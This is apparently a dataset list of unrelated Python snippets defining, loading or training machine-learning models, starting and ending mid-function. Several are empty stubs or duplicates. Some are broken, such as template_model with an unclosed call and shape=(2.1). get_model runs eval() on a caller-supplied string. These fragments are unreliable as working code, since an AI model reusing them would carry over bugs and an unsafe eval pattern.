\n \n try:\n\n DEVICE=torch.device('cpu')\n model = SpeechRNN()\n model = model.to(DEVICE)\n model.load_state_dict(torch.load('weights_cpu_voicerec.pt', map_location=DEVICE))\n\n wav_file = random.choice(sample_file_list)\n waveform,_ = torchaudio.load(wav_file, normalization=True)\n \n # if the waveform is too short (less than 1 second) we pad it with zeroes\n if waveform.shape[1] < 16000:\n waveform = F.pad(input=waveform, pad=(0, 16000 - waveform.shape[1]), mode='constant', value=0)\n \n mfcc_transform = torchaudio.transforms.MFCC(n_mfcc=12, log_mels=True)\n mfcc = mfcc_transform(waveform).squeeze(0).transpose(0,1)\n x = mfcc.unsqueeze(0)\n\n model.eval()\n y = model(x)\n predicted_label = classes[y.max(1)[1].numpy().item()]\n\n input_text = wav_file.split(\"/\")[-1]\n output = f'Prediction of input file {wav_file.split(\"/\")[-1]} is {predicted_label}.'\n\n fields = {'input': input_text,\n 'predicted': output}\n\n return {\"statusCode\": 200, \"headers\": headers, \"body\": json.dumps(fields)}\n\n except ValueError as ve:\n # logger.exception(ve)\n print(ve)\n return {\n \"statusCode\": 422,\n \"headers\": headers,\n \"body\": json.dumps({\"error\": repr(ve)}),\n }\n except Exception as e:\n # logger.exception(e)\n print(e)\n return {\n \"statusCode\": 500,\n \"headers\": headers,\n \"body\": json.dumps({\"error\": repr(e)}),\n }", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model_extract_document_embedding(self):\n input_ids = tf.keras.layers.Input(shape=(self.maxlen,), dtype=tf.int32, name=\"ids\")\n attention_mask = 
tf.keras.layers.Input(shape=(self.maxlen,), dtype=tf.int32, name=\"att\")\n token = tf.keras.layers.Input(shape=(self.maxlen,), dtype=tf.int32, name=\"tok\")\n\n # Embedding :\n if self.method_embedding == 'CamemBERT':\n Camembert_model = transformers.TFCamembertModel.from_pretrained(\"jplu/tf-camembert-base\")\n x = Camembert_model(input_ids, attention_mask=attention_mask, token_type_ids=token)\n elif self.method_embedding == 'FlauBERT':\n # lr = 0.00001\n Flaubert_model = transformers.TFFlaubertModel.from_pretrained(\"jplu/tf-flaubert-base-uncased\")\n x = Flaubert_model(input_ids, attention_mask=attention_mask, token_type_ids=token)\n elif self.method_embedding == 'XLM-RoBERTa':\n # lr = 0.00001\n XLMRoBERTa_model = transformers.TFXLMRobertaModel.from_pretrained(\"jplu/tf-xlm-roberta-base\")\n x = XLMRoBERTa_model(input_ids, attention_mask=attention_mask, token_type_ids=token)\n elif self.method_embedding == 'RoBERTa':\n # Experience Test path weights :\n PATH = '/kaggle/input/tf-roberta/'\n config = transformers.RobertaConfig.from_pretrained(PATH + 'config-roberta-base.json')\n Roberta_model = transformers.TFRobertaModel.from_pretrained(PATH + 'pretrained-roberta-base.h5',\n config=config)\n # Sinon :\n # Roberta_model = transformers.TFRobertaModel.from_pretrained('roberta-base')\n x = Roberta_model(input_ids, attention_mask=attention_mask, token_type_ids=token)\n elif self.method_embedding == 'BERT':\n BERT_model = transformers.TFBertModel.from_pretrained('bert-base-uncased')\n x = BERT_model(input_ids, attention_mask=attention_mask, token_type_ids=token)\n else:\n logger.critical(\"unknown embedding method name : '{}'\".format(self.method_embedding))\n\n # word vectors shape : (None, maxlen, 768)\n x = x[0]\n cls_token = x[:, 0, :]\n\n model = tf.keras.models.Model(inputs=[input_ids, attention_mask, token], outputs=cls_token)\n return model", "def _model_fn(features, labels, mode, config):\n return _transformer_model_fn(\n features=features,\n labels=labels,\n mode=mode,\n head=head_lib._regression_head_with_mean_squared_error_loss(\n label_dimension=label_dimension,\n weight_column=weight_column,\n loss_reduction=loss_reduction),\n num_layers=num_layers,\n d_model=d_model,\n num_heads=num_heads,\n dff=dff,\n input_vocab_size=input_vocab_size,\n target_vocab_size=target_vocab_size,\n output_size=output_size,\n feature_columns=tuple(feature_columns or []),\n optimizer=optimizer,\n dropout=dropout,\n input_layer_partitioner=input_layer_partitioner,\n config=config,\n data_conf=data_conf)", "def model_fn(model_dir):\n model = models.resnet50(pretrained=True)\n\n _ = model.eval()\n\n modules=list(model.children())[:-1]\n model=nn.Sequential(*modules)\n for p in model.parameters():\n p.requires_grad = False\n\n device = torch.device('cuda:0' if torch.cuda.is_available() else \"cpu\")\n\n model = model.to(device)\n\n return model", "def convert_to_model(self, *args):", "def model(input_shape, model,model2,model3, word_to_index):\n \n ### START CODE HERE ###\n # Define sentence_indices as the input of the graph.\n # It should be of shape input_shape and dtype 'int32' (as it contains indices, which are integers).\n sentence_indices = Input(input_shape,dtype='int32')\n \n # Create the embedding layer pretrained with GloVe Vectors (≈1 line)\n embedding_layer, ignored_words = pretrained_embedding_layer(model,model2,model3,word_to_index,300)\n \n # Propagate sentence_indices through your embedding layer\n # (See additional hints in the instructions).\n embeddings = 
embedding_layer(sentence_indices)\n \n # Propagate the embeddings through an LSTM layer with 128-dimensional hidden state\n # The returned output should be a batch of sequences.\n X = LSTM(units=128,input_shape=input_shape,return_sequences=True)(embeddings)\n # Add dropout with a probability of 0.5\n X = Dropout(rate=0.5)(X)\n # Propagate X trough another LSTM layer with 128-dimensional hidden state\n # The returned output should be a single hidden state, not a batch of sequences.\n X = LSTM(units=128,input_shape=input_shape,return_sequences=False)(X)\n # Add dropout with a probability of 0.5\n X = Dropout(rate=0.5)(X)\n # Propagate X through a Dense layer with 5 units\n X = Dense(units=num_classes)(X)\n# X = Dense(6, activation='softmax')\n # Add a softmax activation\n# print(X)\n# print(type(X))\n# print(X.shape)\n# print(sum(X))\n X = Activation('softmax')(X)\n \n # Create Model instance which converts sentence_indices into X.\n model = Model(inputs=sentence_indices,outputs=X)\n \n return model", "def dynamic_model(self, input_val: float) -> float:\n pass", "def _define_model_functions(self):\n # Input of neurons (Batch size x Number of states)\n states = Input(shape=(self.num_states,), dtype=tf.float32, name=\"states\")\n\n # Hidden layers\n layer_1 = layers.Dense(self.hidden_arch[0], activation=self.activation)(states)\n layers_n = [None for _ in range(len(self.hidden_arch))]\n layers_n[0] = layer_1\n for idx, n_neurons in enumerate(self.hidden_arch[1:]):\n layers_n[idx + 1] = layers.Dense(\n n_neurons,\n activation=self.activation,\n )(layers_n[idx])\n\n # Output of neurons is q(s, a) function\n q_s_a = layers.Dense(self.num_actions, name=\"q_s_a\")(layers_n[-1])\n\n # Get the model\n self.model = Model(inputs=states, outputs=q_s_a)\n\n # Loss function and optimizer\n self.loss = losses.MeanSquaredError(reduction=\"auto\", name=\"mean_squared_error\")\n\n self.optimizer = optimizers.Adam(\n learning_rate=self.learning_rate,\n beta_1=self.beta1,\n beta_2=self.beta2,\n name=\"Adam\",\n )", "def deep_model(model = 'luong', validate = True):\n return _softmax_class.deep_model(\n PATH_SENTIMENTS,\n S3_PATH_SENTIMENTS,\n 'sentiment',\n ['negative', 'positive'],\n model = model,\n validate = validate,\n )", "def _model(self):\n common_scale = self.edp_par['common_scale'].value\n model = self.F_trans() * self.F_cont()\n # get F(h=1,k=0), which is used for normalization \n # common_scale is a common scaling factor => F(h=1,k=0) = 100*common_scale\n F_10 = model[(self.h==1)&(self.k==0)]\n model = model / np.absolute(F_10) * 100 * common_scale\n return model", "def custom_model():\n\t# initialize the model\n\t# load weights from path\n\t# returns model\n\tmodel = mlp.get_training_model()\n\tmodel.load_state_dict(torch.load(\"model_wt.pth\"))\n\treturn model", "def getSentenceFormModel(self):", "def call(self, model):\n raise NotImplementedError('Define your score here')", "def __call__(self, model):\n\n result = self.relation(model)\n return 0.5 * result.T @ result", "def model_definition(self):\n pass", "def train_model(self, *args, **kwargs):\n raise NotImplementedError", "def synthesize(self, model, mu = 1.0):\n ndim = len(model.shape)\n dtype = self._get_dtype()\n \n if(ndim == 1):\n model1 = np.ascontiguousarray(model.reshape((1,1,model.size)), dtype=dtype)\n elif(ndim == 3):\n model1 = model\n else:\n print(\"MilneEddington::synthesize: ERROR, the input model must have 1 or 3 dimensions\")\n return None\n\n if(model1.shape[2] != 9):\n print(\"MilneEddington::synthesize: ERROR, input model 
has npar={0}, should be 9\".format(model1.shape[2]))\n return None\n\n isContiguous = model1.flags['C_CONTIGUOUS']\n if(not isContiguous or model1.dtype != dtype):\n model1 = np.ascontiguousarray(model1, dtype=dtype)\n\n \n \n return self.Me.synthesize(model, mu=mu)", "def template_model():\n model_type = 'continuous' # either 'discrete' or 'continuous'\n model = do_mpc.model.Model(model_type)\n\n # Model variables:\n var1 = model.set_variable(var_type='_x', var_name='var1')\n var2 = model.set_variable(var_type='_x', var_name='var2')\n\n state = vertcat(var1,var2)\n state_dot = model.set_variable(var_type='_x', var_name='state_dot', shape=(2.1))\n\n input1 = model.set_variable(var_type='_u', var_name='input1')\n\n\n # Parameters:\n # define Parameters\n\n model.set_rhs('var1',state_dot[0])\n model.set_rhs('var2',state_dot[1])\n\n state_dot_rhs = vertcat(\n # rhs1,\n # rhs2)\n model.set_rhs('state_dot',state_dot_rhs)\n\n model.setup()\n\n return model", "def _train_model(self):\n raise NotImplementedError()", "def _trainedmodel(continuous, modelform, Vr, m=20):\n if continuous == \"inferred\":\n ModelClass = roi._core.InferredContinuousROM\n elif continuous:\n ModelClass = roi._core._ContinuousROM\n else:\n ModelClass = roi._core._DiscreteROM\n\n n,r = Vr.shape\n c, A, H, Hc, G, Gc, B = _get_operators(r, m)\n operators = {}\n if \"c\" in modelform:\n operators['c_'] = c\n if \"A\" in modelform:\n operators['A_'] = A\n if \"H\" in modelform:\n operators['Hc_'] = Hc\n if \"G\" in modelform:\n operators['Gc_'] = Gc\n if \"B\" in modelform:\n operators['B_'] = B\n\n model = roi._core.trained_model_from_operators(ModelClass, modelform,\n Vr, **operators)\n model.datacond_ = np.random.random()\n model.dataregcond_ = model.datacond_ / 2\n model.residual_ = np.random.random()\n model.misfit_ = model.residual_ / 2\n\n return model", "def setup_model(self) -> (nn.Module, int):", "def __call__(self, X):\n return self.model(X)", "def gen_model():\n\n\tmodel = skipthoughts.load_model()\n\treturn model", "def MakeModel(self):\n pass", "def create_model(window, input_shape, num_actions,\n model_name='q_network'):\n if model_name == 0:\n model = linear_model(window, input_shape, num_actions)\n elif model_name == 1:\n model = deep_model(window, input_shape, num_actions)\n elif model_name == 2:\n model = dueling_deep(window, input_shape, num_actions)\n else:\n print(\"No suitable models found.\")\n exit()\n print(model.summary())\n return model", "def train(self, model, args):\n if model == self.WORD_DET_RFC:\n return self.train_rfc(args)\n elif model == self.REGRESSION_PARAMS:\n return self.train_bb_reg(args)\n else:\n raise Exception('No model %s exists to train' % model)", "def masked_language_model(vocab, model, mask_prob=...):\n ...", "def get_model(model: str) -> Any:\n try:\n model_function = eval(model)\n except (NameError, AttributeError) as err:\n sys.exit(f'{err}. 
Accepted models from {tf}, {sm}, {tfa}, {tfc}')\n return model_function", "def create_model(args, pretrained_embedding: np.ndarray, model_name='deep_q_network', trainable=True):\n\n state = Input(shape=(args.n_features,))\n model = None\n\n n, m = pretrained_embedding.shape\n print('shape', pretrained_embedding.shape)\n embedded = Embedding(n, m, embeddings_initializer=keras.initializers.constant(pretrained_embedding))(state)\n\n if model_name == \"deep_q_network\":\n print(\"Building \" + model_name + \" ...\")\n\n # First convolutional layer\n\n x = Dense(args.hidden_size, activation=K.relu)(embedded)\n x = Dropout(args.dropout)(x)\n x = Flatten()(x)\n y_pred = Dense(args.n_actions, trainable=trainable)(x)\n\n model = Model(inputs=state, outputs=y_pred)\n\n elif model_name == \"deep_q_network_double\":\n print(\"Building \" + model_name + \" ...\")\n\n x = Dense(args.hidden_size, activation=K.relu)(embedded)\n x = Dropout(args.dropout)(x)\n x = Flatten()(x)\n y_pred = Dense(args.n_actions, trainable=trainable)(x)\n\n model = Model(input=state, output=y_pred)\n\n elif model_name == \"deep_q_network_duel\":\n print(\"Building \" + model_name + \" ...\")\n\n x = Dense(args.hidden_size, activation=K.relu)(embedded)\n x = Dropout(args.dropout)(x)\n x = Flatten()(x)\n\n y_pred = Dense(args.n_actions, trainable=trainable)(x)\n\n # value output\n x_val = Dense(args.hidden_size, trainable=trainable)(x)\n # x_val = Activation('relu')(x_val)\n y_val = Dense(1, trainable=trainable)(x_val)\n\n # advantage output\n x_advantage = Dense(args.hidden_size, trainable=trainable)(x)\n # x_advantage = Activation('relu')(x_advantage)\n y_advantage = Dense(args.n_actions, trainable=trainable)(x_advantage)\n # mean advantage\n y_advantage_mean = Lambda(lambda x: K.mean(x, axis=1, keepdims=True))(y_advantage)\n\n y_q = Lambda(lambda x: x[0] + x[1] - x[2])([y_val, y_advantage, y_advantage_mean])\n\n model = Model(input=state, output=y_q)\n\n else:\n print(\"Model not supported\")\n exit(1)\n\n return model", "def model_fn(model_dir):\n\n net = gluon.nn.SymbolBlock.imports('%s/model.json' % model_dir,\n ['data'], \n param_file='%s/model.params' % model_dir,\n ctx=mx.cpu())\n\n return net", "def define_model(model):\n global log_data_likelihood, log_priors, num_params, file_labels, labels, prior_xs, prior_pdfs\n num_prior_pts = 1001\n pic50_lower = -4.\n pic50_upper = 14.\n hill_lower = 0.\n hill_upper = 6.\n if model == 1:\n num_params = 2\n log_data_likelihood = log_data_likelihood_model_1_capped\n log_priors = log_priors_model_1\n labels = [r\"$pIC50$\", r\"$\\sigma$\"]\n file_labels = ['pIC50','sigma']\n #prior_xs = [np.linspace(pic50_lower, pic50_upper, num_prior_pts),\n # np.linspace(sigma_uniform_lower,sigma_uniform_upper,num_prior_pts)]\n prior_xs = [np.linspace(pic50_exp_lower-2, pic50_exp_lower+23, num_prior_pts),\n np.linspace(0, 25, num_prior_pts)]\n #prior_pdfs = [st.logistic.pdf(prior_xs[0], loc=mu, scale=s),\n # np.ones(num_prior_pts)/(1.*sigma_uniform_upper-sigma_uniform_lower)]\n #prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n # np.concatenate(([0,0],np.ones(num_prior_pts)/(1.*sigma_uniform_upper-sigma_uniform_lower),[0,0]))]\n prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n st.gamma.pdf(prior_xs[1], sigma_shape, loc=sigma_loc, scale=sigma_scale)]\n elif model == 2:\n num_params = 3\n log_data_likelihood = log_data_likelihood_model_2_capped\n log_priors = log_priors_model_2\n labels = [r\"$pIC50$\", r\"$Hill$\", 
r\"$\\sigma$\"]\n file_labels = ['pIC50','Hill','sigma']\n #prior_xs = [np.linspace(pic50_lower, pic50_upper, num_prior_pts),\n # np.linspace(hill_lower, hill_upper, num_prior_pts),\n # np.linspace(sigma_uniform_lower,sigma_uniform_upper,num_prior_pts)]\n prior_xs = [np.linspace(pic50_exp_lower-2, pic50_exp_lower+23, num_prior_pts),\n np.concatenate(([hill_uniform_lower-2,hill_uniform_lower],\n np.linspace(hill_uniform_lower, hill_uniform_upper, num_prior_pts),\n [hill_uniform_upper,hill_uniform_upper+2])),\n np.linspace(0, 25, num_prior_pts)]\n #prior_pdfs = [st.logistic.pdf(prior_xs[0],loc=mu,scale=s),\n # st.fisk.pdf(prior_xs[1],c=beta,scale=alpha),\n # np.ones(num_prior_pts)/(1.*sigma_uniform_upper-sigma_uniform_lower)]\n #prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n # np.concatenate(([0,0],np.ones(num_prior_pts) / (1. * hill_uniform_upper - hill_uniform_lower),[0,0])),\n # np.concatenate(([0, 0], np.ones(num_prior_pts) / (1. * sigma_uniform_upper - sigma_uniform_lower), [0, 0]))]\n prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n np.concatenate(([0,0],np.ones(num_prior_pts) / (1. * hill_uniform_upper - hill_uniform_lower),[0,0])),\n st.gamma.pdf(prior_xs[2], sigma_shape, loc=sigma_loc, scale=sigma_scale)]", "def run_deep_speech():\n global FLAGS\n tf.set_random_seed(FLAGS.seed)\n # Data precessing\n tf.logging.info(\"Data Processing...\")\n train_speech_dataset = generate_dataset(FLAGS.data_dir, partition=\"train\")\n eval_speech_dataset = generate_dataset(FLAGS.data_dir, partition=\"dev\")\n\n # Number of label classes. Label string is \"[a-z]' -\"\n num_classes = len(train_speech_dataset.speech_labels)\n\n # not available in 1.4\n distribution_strategy = distribution_utils.get_distribution_strategy(num_gpus=FLAGS.num_gpus)\n run_config = es.RunConfig(train_distribute=distribution_strategy, session_config=get_session_config())\n\n estimator = es.Estimator(\n model_fn=model_fn, model_dir=FLAGS.model_dir, config=run_config, params={\"num_classes\": num_classes})\n\n run_params = {\n \"batch_size\": FLAGS.batch_size,\n \"train_epochs\": FLAGS.train_epochs,\n \"rnn_hidden_size\": FLAGS.rnn_hidden_size,\n \"rnn_hidden_layers\": FLAGS.rnn_hidden_layers,\n \"rnn_type\": FLAGS.rnn_type,\n \"is_bidirectional\": FLAGS.is_bidirectional,\n \"use_bias\": FLAGS.use_bias\n }\n\n benchmark_logger = logger.get_benchmark_logger()\n benchmark_logger.log_run_info(\n model_name=\"deep_speech\", dataset_name=\"LibriSpeech\", run_params=run_params, test_id=FLAGS.benchmark_test_id)\n\n train_hooks = hooks_helper.get_train_hooks(FLAGS.hooks, model_dir=FLAGS.model_dir, batch_size=FLAGS.batch_size)\n per_replica_batch_size = distribution_utils.per_replica_batch_size(FLAGS.batch_size, FLAGS.num_gpus)\n\n def input_fn_train():\n return train_speech_dataset.input_fn(batch_size=per_replica_batch_size)\n\n def input_fn_eval():\n return eval_speech_dataset.input_fn(batch_size=per_replica_batch_size)\n\n # total_training_cycle = FLAGS.train_epochs // FLAGS.epochs_between_evals\n total_training_cycle = FLAGS.train_epochs\n\n for cycle_index in range(total_training_cycle):\n tf.logging.info(f\"Starting train cycle: {cycle_index + 1} / {total_training_cycle}\")\n\n # Perform batch_wise dataset shuffling\n train_speech_dataset.batch_wise_shuffle(FLAGS.batch_size)\n\n # Train\n estimator.train(input_fn=input_fn_train, hooks=train_hooks)\n\n # Evaluation\n tf.logging.info(\"Starting to evaluate...\")\n eval_results = evaluate_model(estimator, 
speech_labels=eval_speech_dataset.speech_labels,\n entries=eval_speech_dataset.entries, input_fn_eval=input_fn_eval)\n\n # Log the WER and CER results.\n benchmark_logger.log_evaluation_result(eval_results)\n tf.logging.info(\n f\"Iteration {cycle_index + 1}: WER = {eval_results[_WER_KEY]:.2f}, CER = {eval_results[_CER_KEY]:.2f}\")", "def apply_model(model: BaseModel, **kwargs):\n raise NotImplementedError(f'Unknown model: {model}')", "def synthesize_rf(self, model, mu=1.0):\n ndim = len(model.shape)\n dtype = self._get_dtype()\n \n if(ndim == 1):\n model1 = np.ascontiguousarray(model.reshape((1,1,model.size)), dtype=dtype)\n elif(ndim == 3):\n model1 = model\n else:\n print(\"MilneEddington::synthesize_rf: ERROR, the input model must have 1 or 3 dimensions\")\n return None\n\n if(model1.shape[2] != 9):\n print(\"MilneEddington::synthesize_rf: ERROR, input model has npar={0}, should be 9\".format(model1.shape[2]))\n return None\n\n isContiguous = model1.flags['C_CONTIGUOUS']\n if(not isContiguous or model1.dtype != dtype):\n model1 = np.ascontiguousarray(model1, dtype=dtype)\n\n \n \n return self.Me.synthesize_RF(model, mu=mu)", "def set_model_func(self, model):\n if model == 'SI':\n import cavefish_dadi.Models.si\n return cavefish_dadi.Models.si.si\n elif model == 'SC':\n import cavefish_dadi.Models.sc\n return cavefish_dadi.Models.sc.sc\n elif model == 'IM':\n import cavefish_dadi.Models.im\n return cavefish_dadi.Models.im.im\n elif model == 'AM':\n import cavefish_dadi.Models.am\n return cavefish_dadi.Models.am.am\n elif model == 'SC2M':\n import cavefish_dadi.Models.sc2m\n return cavefish_dadi.Models.sc2m.sc2m\n elif model == 'IM2M':\n import cavefish_dadi.Models.im2m\n return cavefish_dadi.Models.im2m.im2m\n elif model == 'AM2M':\n import cavefish_dadi.Models.am2m\n return cavefish_dadi.Models.am2m.am2m\n else:\n return None", "def build_model(self):\n raise NotImplementedError", "def _synthesize_for_model(model: Model) -> Formula:\n assert is_model(model)\n assert len(model.keys()) > 0\n # Task 2.6\n vars = list(variables(model))\n formula =_synthesize_for_model_helper(model, vars, 0)\n return formula", "def get_model_fn(model, num_classes, spatial_res):\n\n model = model.lower()\n if model == \"cnn\": return get_cnn_fn(model, num_classes)\n if model in RESNET_FNS: return get_resnet_fn(model, num_classes, spatial_res)\n if model in VIT_FNS: return get_vit_fn(model, num_classes, spatial_res)\n if model in EFFICIENTNET_FNS: return get_efficientnet_fn(model, num_classes,\n spatial_res)\n raise ValueError(f\"Model {model} not recognized.\")", "def generate_model(corpus, dictionary):\n NUM_TOPICS = 5\n ldamodel = gensim.models.ldamodel.LdaModel(corpus, num_topics=NUM_TOPICS,\n id2word=dictionary, passes=15)\n ldamodel.save('model5.gensim')", "def model_fn(model_dir):\n ctx = mx.cpu()\n net = gcv.model_zoo.get_model(\n 'yolo3_darknet53_voc',\n pretrained=False,\n ctx=ctx)\n batchify = gcv.data.batchify._stack_arrs\n net.load_parameters(os.path.join(model_dir, 'yolo3_darknet53_voc.params'), mx.cpu(0))\n net.hybridize()\n def image_transform(im_bytes):\n \"\"\"\n Apply image transformation to raw byte images\n \"\"\"\n img = [mx.image.imdecode(bytes.fromhex(im.lstrip('0x'))) for im in im_bytes]\n out = gcv.data.transforms.presets.yolo.transform_test(img)\n return out[0]\n\n return net, image_transform, batchify", "def model_fn(model_dir):\n\n model = BertForSequenceClassification.from_pretrained('cl-tohoku/bert-base-japanese-whole-word-masking', \n num_labels=1)\n model = 
torch.nn.DataParallel(model)\n with open(os.path.join(model_dir, 'model.pth'), 'rb') as f:\n model.load_state_dict(torch.load(f))\n \n return {\"net\": model, \"tokenizer\": tokenizer}", "def train_callback(self, model):\n pass", "def train_callback(self, model):\n pass", "def initialize_model(model_name, num_classes, feature_extract, verbose=False):\n\n model_ft = None\n\n if model_name == \"resnet\":\n \"\"\" Resnet18\n \"\"\"\n model_ft = models.resnet18(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"alexnet\":\n \"\"\" Alexnet\n \"\"\"\n model_ft = models.alexnet(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"vgg\":\n \"\"\" VGG11_bn\n \"\"\"\n model_ft = models.vgg11_bn(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"squeezenet\":\n \"\"\" Squeezenet\n \"\"\"\n with warnings.catch_warnings(): # temporarily suppress warnings about deprecated functions\n warnings.simplefilter(\"ignore\")\n model_ft = models.squeezenet1_0(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1, 1), stride=(1, 1))\n model_ft.num_classes = num_classes\n\n elif model_name == \"densenet\":\n \"\"\" Densenet\n \"\"\"\n model_ft = models.densenet121(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"inception\":\n \"\"\" Inception v3\n Be careful, expects (299,299) sized images and has auxiliary output\n \"\"\"\n model_ft = models.inception_v3(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n # Handle the auxilary net\n num_ftrs = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\n # Handle the primary net\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n\n else: # Unreachable\n exit()\n\n # Gather the parameters to be optimized\n params_to_update = list(filter(lambda p: p.requires_grad, model_ft.parameters()))\n\n # Print model info\n if verbose:\n print()\n print(model_ft)\n print()\n print(\"Params to learn:\")\n for name, param in model_ft.named_parameters():\n if param.requires_grad:\n print('\\t', name)\n\n return model_ft, params_to_update", "def synthesize(model, mspec, spk):\n if use_cuda:\n model = model.cuda()\n\n model.eval()\n\n sequence = np.array(mspec)\n sequence = Variable(torch.from_numpy(sequence)).unsqueeze(0)\n spk = np.array(spk)\n spk = Variable(torch.from_numpy(spk)).unsqueeze(0)\n\n if use_cuda:\n sequence = sequence.cuda() \n spk = spk.cuda()\n\n with torch.no_grad():\n model.forward_getlatents(sequence)\n mel_outputs, linear_outputs, = model.forward_eval(sequence, spk)\n\n linear_output = linear_outputs[0].cpu().data.numpy()\n spectrogram = audio.denormalize(linear_output)\n waveform = audio.inv_spectrogram(linear_output.T)\n\n return waveform", "def model(self) -> Type[Model]:", "def synthesize_for_model(model: Model) -> Formula:\r\n # the idea is -> first step put the var or ~var\r\n # than each 
time do - > add '(' at first\r\n # '(' + the_string '&' + the_new_string + ')'\r\n \"\"\"\r\n We solve this equation by using CNF.\r\n every var that is false we doing ~var, and connecting all the var by '&'\r\n and this will provide us with formula which is true just \r\n for the given model\r\n \"\"\"\r\n assert is_model(model)\r\n # Task 2.6\r\n first = True\r\n str_formula = \"\"\r\n for key, value in model.items():\r\n if first:\r\n first = False\r\n if not value:\r\n str_formula += '~'\r\n str_formula += key\r\n else:\r\n str_formula = \"(\" + str_formula + \"&\"\r\n if not value:\r\n str_formula += '~'\r\n str_formula += key\r\n str_formula += \")\"\r\n # creating a list, that list[0] contain the string, because that what\r\n # list_to_string function is required\r\n list_of_string = list()\r\n list_of_string.append(str_formula)\r\n return str_to_form(list_of_string)", "def __call__(self, x, **kwargs):\n return self.model(x)", "def create_model(data, cont, cat, target): \n\n cont_features = '+'.join(cont)\n\n cat_features = '+'.join([f'C({x})' for x in cat])\n\n f = f'{target}~+{cont_features}+{cat_features}'\n\n print(f)\n\n model = smf.ols(formula=f, data=data).fit()\n \n diagnose_model(model)\n \n return model", "def build_model(self, **kwargs):\n raise NotImplementedError()", "def __init__(self):\n self.name = \"Schaffer\"\n objectives = [o_sh_1, o_sh_2]\n decisions = [Decision(-10 ** 5, 10 ** 5)]\n Model.__init__(self, objectives, None, decisions)", "def model(flags):\n input_audio = tf.keras.layers.Input(\n shape=modes.get_input_data_shape(flags, modes.Modes.TRAINING),\n batch_size=flags.batch_size)\n net = input_audio\n\n if flags.preprocess == 'raw':\n # it is a self contained model, user need to feed raw audio only\n net = speech_features.SpeechFeatures(\n speech_features.SpeechFeatures.get_params(flags))(\n net)\n\n time_size, feature_size = net.shape[1:3]\n\n channels = parse(flags.channels)\n\n net = tf.keras.backend.expand_dims(net)\n\n if flags.debug_2d:\n conv_kernel = first_conv_kernel = (3, 3)\n else:\n net = tf.reshape(\n net, [-1, time_size, 1, feature_size]) # [batch, time, 1, feature]\n first_conv_kernel = (3, 1)\n conv_kernel = parse(flags.kernel_size)\n\n net = tf.keras.layers.Conv2D(\n filters=channels[0],\n kernel_size=first_conv_kernel,\n strides=1,\n padding='same',\n activation='linear')(\n net)\n net = tf.keras.layers.BatchNormalization(\n momentum=flags.bn_momentum,\n center=flags.bn_center,\n scale=flags.bn_scale,\n renorm=flags.bn_renorm)(\n net)\n net = tf.keras.layers.Activation('relu')(net)\n\n if parse(flags.pool_size):\n net = tf.keras.layers.AveragePooling2D(\n pool_size=parse(flags.pool_size), strides=flags.pool_stride)(\n net)\n\n channels = channels[1:]\n\n # residual blocks\n for n in channels:\n if n != net.shape[-1]:\n stride = 2\n layer_in = tf.keras.layers.Conv2D(\n filters=n,\n kernel_size=1,\n strides=stride,\n padding='same',\n activation='linear')(\n net)\n layer_in = tf.keras.layers.BatchNormalization(\n momentum=flags.bn_momentum,\n center=flags.bn_center,\n scale=flags.bn_scale,\n renorm=flags.bn_renorm)(\n layer_in)\n layer_in = tf.keras.layers.Activation('relu')(layer_in)\n else:\n layer_in = net\n stride = 1\n\n net = tf.keras.layers.Conv2D(\n filters=n,\n kernel_size=conv_kernel,\n strides=stride,\n padding='same',\n activation='linear')(\n net)\n net = tf.keras.layers.BatchNormalization(\n momentum=flags.bn_momentum,\n center=flags.bn_center,\n scale=flags.bn_scale,\n renorm=flags.bn_renorm)(\n net)\n net = 
tf.keras.layers.Activation('relu')(net)\n\n net = tf.keras.layers.Conv2D(\n filters=n,\n kernel_size=conv_kernel,\n strides=1,\n padding='same',\n activation='linear')(\n net)\n net = tf.keras.layers.BatchNormalization(\n momentum=flags.bn_momentum,\n center=flags.bn_center,\n scale=flags.bn_scale,\n renorm=flags.bn_renorm)(\n net)\n\n # residual connection\n net = tf.keras.layers.Add()([net, layer_in])\n net = tf.keras.layers.Activation('relu')(net)\n\n net = tf.keras.layers.AveragePooling2D(\n pool_size=net.shape[1:3], strides=1)(\n net)\n\n net = tf.keras.layers.Dropout(rate=flags.dropout)(net)\n\n # fully connected layer\n net = tf.keras.layers.Conv2D(\n filters=flags.label_count,\n kernel_size=1,\n strides=1,\n padding='same',\n activation='linear')(\n net)\n\n net = tf.reshape(net, shape=(-1, net.shape[3]))\n return tf.keras.Model(input_audio, net)", "def model_creator(config):\n return nn.Linear(1, 1)", "def recog_v2(args):\n logging.warning(\"experimental API for custom LMs is selected by --api v2\")\n if args.batchsize > 1:\n raise NotImplementedError(\"multi-utt batch decoding is not implemented\")\n if args.streaming_mode is not None:\n raise NotImplementedError(\"streaming mode is not implemented\")\n if args.word_rnnlm:\n raise NotImplementedError(\"word LM is not implemented\")\n\n set_deterministic_pytorch(args)\n model, train_args = load_trained_model(args.model)\n\n # add lang2ph to the model\n if args.mask_phoneme:\n logging.warning(f'mask phoneme and create lang2ph for model')\n assert args.lang2ph is not None\n with open(args.lang2ph, 'r') as f:\n 